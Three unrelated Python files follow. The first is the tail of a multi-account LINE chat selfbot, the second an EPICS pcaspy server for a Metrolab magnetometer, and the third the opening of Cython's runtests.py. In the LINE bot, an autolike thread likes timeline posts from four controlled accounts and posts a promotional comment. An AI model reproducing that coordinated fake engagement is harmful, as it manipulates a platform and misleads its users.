gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Staff deleted")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"please wait...")
mc = ""
for mi_d in admin:
mc += "\n- " + cl.getContact(mi_d).displayName
cl.sendText(msg.to, "Staff :\n" + mc)
print "[Command]Stafflist executed"
elif msg.text in ["Kernel","kernel"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-svmo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel)
print "[Command]Kernel executed"
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n- " + Name
wait2['ROM'][op.param1][op.param2] = "- " + Name
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
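# nameUpdate(): while wait["clock"] is enabled, periodically rewrites each account's display name
# from wait["cName"], wait["cName2"], ... every 10 minutes. It assumes the extra clients
# (ks, ka, kb, ko, ke, ku) exist; the bare except simply skips a cycle if any of them are missing.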
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
profile6 = ka.getProfile()
profile6.displayName = wait["cName6"]
ka.updateProfile(profile6)
profile7 = kb.getProfile()
profile7.displayName = wait["cName7"]
kb.updateProfile(profile7)
profile8 = ko.getProfile()
profile8.displayName = wait["cName8"]
ko.updateProfile(profile8)
profile9 = ke.getProfile()
profile9.displayName = wait["cName9"]
ke.updateProfile(profile9)
profile10 = ku.getProfile()
profile10.displayName = wait["cName10"]
ku.updateProfile(profile10)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
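# autolike(): scans the most recent timeline posts and, for any not yet liked, likes them from all
# four clients and leaves a comment, pausing between iterations. Runs as a daemon thread below.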
def autolike():
for zx in range(0,20):
hasil = cl.activity(limit=200)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1003)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like by\nline.me/ti/p/~boy29putra")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1003)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1003)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1003)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(200)
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
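# Main long-poll loop: fetch up to 5 pending operations, advance the stored revision,
# and hand each operation to bot() for dispatch.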
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
pcaspy_server.py
|
import numpy as np
import time
from pcaspy import Driver, SimpleServer, Severity
import threading as th
import queue
import thm1176MFusbtmc as thm1176MF
from usbtmc.usbtmc import find_device
prefix = 'METROLAB:'
pvdb = {
'Block' : {'type': 'int', 'value': 1},
'Average' : {'type': 'int', 'value': 200},
'Period' : {'type': 'float', 'value': 0.001, 'unit': 's'},
'Trigger' : {'type': 'enum', 'enums': [''], 'value': 0},
'Range' : {'type': 'enum', 'enums': [''], 'value': 0},
'B' : {'type': 'float', 'value': 0, 'unit': 'T'},
'Bx' : {'type': 'float', 'value': 0, 'unit': 'T'},
'By' : {'type': 'float', 'value': 0, 'unit': 'T'},
'Bz' : {'type': 'float', 'value': 0, 'unit': 'T'},
'dt' : {'type': 'float', 'value': 0, 'unit': 's'},
'dB' : {'type': 'float', 'value': 0, 'unit': 'T/s'},
'dBx' : {'type': 'float', 'value': 0, 'unit': 'T/s'},
'dBy' : {'type': 'float', 'value': 0, 'unit': 'T/s'},
'dBz' : {'type': 'float', 'value': 0, 'unit': 'T/s'},
'Timer' : {'type': 'float', 'value': 0.5},
'Connected': {'type': 'enum', 'enums': ['Not connected', 'Connected'], 'states': [Severity.MAJOR_ALARM, Severity.NO_ALARM], 'value': 0},
}
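# The PVs above are served under the 'METROLAB:' prefix (e.g. METROLAB:B, METROLAB:Timer);
# 'Connected' goes to a MAJOR alarm state while the THM1176 probe is unreachable.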
class THM1176MFDriver(Driver):
def __init__(self):
Driver.__init__(self)
r = find_device(idVendor=0x1bfa, idProduct=0x0498)
period = self.getParam('Period')
average = self.getParam('Average')
block = self.getParam('Block')
self.setParam('Connected', 0)
self.updatePVs()
self.instruction_queue = queue.Queue()
self.device = thm1176MF.thm1176(address=r, period=period, average=average, block=block)
ranges = list(self.device.ranges)
ranges.append('AUTO')
self.setParamEnums('Range', ranges)
res, auto = self.device.range
details = self.getParamInfo('Range')
if auto:
self.setParam('Range', details['enums'].index('AUTO'))
else:
self.setParam('Range', details['enums'].index(res))
self.setParamEnums('Trigger', list(self.device.triggers))
self.setParam('Trigger', self.getParamInfo('Trigger', info_keys=['enums'])['enums'].index(self.device.trigger.capitalize()))
self.setParam('Connected', 1)
self.updatePVs()
self.mapping = {
'Block': self.setBlock,
'Average': self.setAverage,
'Period': self.setPeriod,
'Trigger': self.setTrigger,
'Range': self.setRange,
'Timer': self.setTimer,
}
self.looping = True
self.t = time.perf_counter()
self.timerThread = th.Thread(target=self.signalData)
self.timerThread.setDaemon(True)
self.loopThread = th.Thread(target=self.loop)
self.loopThread.setDaemon(True)
self.loopThread.start()
self.timerThread.start()
def signalData(self):
while self.looping:
if self.instruction_queue.empty():
self.instruction_queue.put('DATA')
time.sleep(self.getParam('Timer'))
def setRange(self, range):
range = self.getParamInfo('Range', info_keys=['enums'])['enums'][range]
self.device.range = range
res, auto = self.device.range
details = self.getParamInfo('Range')
if auto:
self.setParam('Range', details['enums'].index('AUTO'))
else:
self.setParam('Range', details['enums'].index(res))
self.updatePVs()
def setTrigger(self, trigger):
trigger = self.getParamInfo('Trigger', info_keys=['enums'])['enums'][trigger]
self.device.trigger = trigger
trigger = self.device.trigger.capitalize()
details = self.getParamInfo('Trigger')
self.setParam('Trigger', details['enums'].index(trigger))
def setBlock(self, block):
block = max(1, block)
self.checkTimer(block=block)
self.device.block = int(block)
self.setParam('Block', self.device.block)
def setAverage(self, average):
average = max(10, average)
self.checkTimer(average=average)
self.device.average = int(average)
self.setParam('Average', self.device.average)
def setPeriod(self, period):
period = max(0.05, period)
self.checkTimer(period=period)
self.device.period = float(period)
self.setParam('Period', self.device.period)
def checkTimer(self, block=None, average=None, period=None, timer=None):
if block is None:
block = self.device.block
if average is None:
average = self.device.average
if period is None:
period = self.device.period
if timer is None:
timer = self.getParam('Timer')
min_timer = (block + 1) * period
self.setParam('Timer', max(min_timer, timer))
def setTimer(self, timer):
self.checkTimer(timer=timer)
def loop(self):
while self.looping:
instr = self.instruction_queue.get(block=True)
try:
if instr == 'DATA':
self.device.get_data_array()
try:
B = self.device.B[-1]
X = self.device.X[-1]
Y = self.device.Y[-1]
Z = self.device.Z[-1]
dt = self.device.dt
dB = (B - self.getParam('B')) / dt
dX = (X - self.getParam('Bx')) / dt
dY = (Y - self.getParam('By')) / dt
dZ = (Z - self.getParam('Bz')) / dt
self.setParam('B', B)
self.setParam('Bx', X)
self.setParam('By', Y)
self.setParam('Bz', Z)
self.setParam('dB', dB)
self.setParam('dBx', dX)
self.setParam('dBy', dY)
self.setParam('dBz', dZ)
self.setParam('dt', dt)
except IndexError:
pass
else:
reason, value = instr
reason = reason.split(':')[-1]
if reason in self.mapping.keys():
self.mapping[reason](value)
self.setParam('Connected', 1)
except:
self.setParam('Connected', 0)
self.device.close()
r = find_device(idVendor=0x1bfa, idProduct=0x0498)
period = self.getParam('Period')
average = self.getParam('Average')
block = self.getParam('Block')
self.device = thm1176MF.thm1176(address=r, period=period, average=average, block=block)
self.updatePVs()
def write(self, reason, value):
r = reason.split(':')[-1]
if r in self.mapping:
try:
self.instruction_queue.put((reason, value), block=True)
super().write(reason, value)
except:
pass
def stop(self):
self.looping = False
if __name__ == '__main__':
server = SimpleServer()
server.createPV(prefix, pvdb)
driver = THM1176MFDriver()
while True:
server.process(0.001)
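# Hypothetical client-side check using the standard EPICS command-line tools (not part of this file):
# caget METROLAB:B METROLAB:Connected
# caput METROLAB:Average 500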
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see http://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:numpy_old': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_old_numpy_extension(ext):
update_numpy_extension(ext, set_api17_macro=False)
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro:
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:numpy_old' : update_old_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
(2,7) : (operator.lt, lambda x: x in ['run.withstat_py27', # multi context with statement
'run.yield_inside_lambda',
'run.test_dictviews',
'run.pyclass_special_methods',
'run.set_literals',
]),
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2'
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
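# Example of the header block parse_tags() reads from the top of a test file (illustrative only):
# # mode: run
# # tag: numpy, openmp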
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self):
self.output = []
self.write = self.output.append
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if sys.platform not in ['win32'] and self.add_embedded_test:
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir, self.cleanup_workdir, stats=self.stats))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
from pythran import __version__ as pythran_version
pythran_ext = (
pythran.config.make_extension(python=True)
if pythran_version >= '0.9' or pythran_version >= '0.8.7'
else pythran.config.make_extension()
)
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list ]
return tests
def build_test(self, test_class, path, workdir, module, tags, language,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % str(preparse)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
fork=self.fork,
language_level=self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
